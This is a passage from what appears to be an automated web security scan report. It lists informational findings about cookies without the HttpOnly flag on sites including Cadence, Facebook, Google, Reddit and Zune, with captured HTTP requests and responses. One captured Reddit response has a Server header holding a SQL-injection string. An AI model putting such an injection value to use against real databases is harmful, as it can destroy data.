GET /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 140289
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
X-Pingback: http://www.cadence.com/Community/blogs/fv/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Set-Cookie: CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8; expires=Thu, 07-Jul-2011 01:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
7.24. http://www.cadence.com/community/themes/default/style/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /community/themes/default/style/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/themes/default/style/DynamicStyle.aspx HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:55 GMT; CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 6539
Content-Type: text/css; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


/* General Styles */

body, html, .CommonContent
{
font-family: Arial, Helvetica;
color: #333333;
}

form
{
background-color: #FFFFFF;
background-image: none;
min-w
...[SNIP]...
7.25. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
7.26. http://www.google.com/bookmarks/mark  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /bookmarks/mark

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmarks/mark HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: https://www.google.com/bookmarks/mark
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1309961256:S=OFu8ed6ChCeuzoxj; expires=Fri, 05-Jul-2013 14:07:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:07:36 GMT
Server: Search-History HTTP Server
Content-Length: 234
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.google.com/bookmarks
...[SNIP]...
7.27. http://www.masshightech.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.masshightech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:12:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 08 Jul 2008 20:19:59 GMT
Accept-Ranges: bytes
Cteonnt-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:24:56 GMT;path=/
Cache-Control: private
Content-Length: 3638

..............h...&... ..............(....... ...........@.............................).......c..m............J...J..}....s..}!...........9.......9......y........!...1...k.......B..............y....
...[SNIP]...
7.28. http://www.masshightech.com/tech-news-widget/parser/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/parser/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech-news-widget/parser/?limit=5&feedName=mass_high_tech&feed=http://www.masshightech.com/rss.html&callback=jsonp1309960847664&_=1309960851255 HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2317
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:13:00 GMT;path=/

jsonp1309960847664({"items":[{"title":"Precision Biopsy closes $2.5M funding","link":"http:\/\/www.masshightech.com\/stories\/2011\/07\/04\/daily17-Precision-Biopsy-closes-25M-funding.html","publishDa
...[SNIP]...
7.29. http://www.masshightech.com/tech-news-widget/widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/widget.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech-news-widget/widget.js HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Jun 2009 16:00:16 GMT
Accept-Ranges: bytes
Cteonnt-Length: 8381
Connection: close
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:12:33 GMT;path=/
Cache-Control: private
Content-Length: 8381

/**
* Mass High Tech Widget
* version 1.2
*
* Copyright (c) 2009, All Rights Reserved Worldwide
*
* author Fred LeBlanc <fred@suredev.com> of SureDev via Boston Web Studio
* created for
...[SNIP]...
7.30. http://www.newsvine.com/_tools/seed&save  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_tools/seed&save

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/seed&save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 11:20:51 GMT
Server: Apache/2.2.16 (Debian)
Set-Cookie: vid=3f48247f336bc03315b1da835fb52d70; expires=Tue, 01-Jul-2031 11:20:51 GMT; path=/; domain=.newsvine.com
Location: /_nv/accounts/login?redirect=https%3A%2F%2Fwww.newsvine.com%2F_tools%2Fseed%26save
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

7.31. http://www.reddit.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reddit.com
Path:   /submit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /submit HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.reddit.com/login?dest=%2Fsubmit
Set-Cookie: reddit_first=%7B%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/
Server: '; DROP TABLE servertypes; --
Content-Length: 0
Date: Wed, 06 Jul 2011 13:56:58 GMT
Connection: close

7.32. http://www.tudou.com/v/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...
7.33. http://www.zune.net/en-US/legal/codeOfConduct.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/codeOfConduct.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/codeOfConduct.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 27495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.34. http://www.zune.net/en-US/legal/termsofservice.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/termsofservice.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/termsofservice.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 94559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.35. http://www.zune.net/en-US/press/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/press/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/press/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S503
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 33125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.36. http://www.zune.net/en-US/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.37. http://www.zune.net/en-US/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support/ HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.38. http://www.zune.net/en-us/legal/safety.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/legal/safety.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/legal/safety.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.39. http://www.zune.net/en-us/newsletter/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/newsletter/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/newsletter/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 28717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.40. http://www.zune.net/en-us/products/zuneonxbox/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/products/zuneonxbox/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/products/zuneonxbox/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 30517


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.41. http://www.zune.net/en-us/support/accessibility/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/support/accessibility/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/support/accessibility/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S104
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.42. http://zune.net/en-US/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-US/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/ HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:18:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 11:18:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 51934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.43. http://zune.net/en-US/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-US/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/default.htm HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S103
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:57:51 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48536


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.44. http://zune.net/en-US/flexpage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-US/flexpage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/flexpage.aspx HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:56:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.45. http://zune.net/en-us/promotions/zunepassatt.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /en-us/promotions/zunepassatt.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/promotions/zunepassatt.htm HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
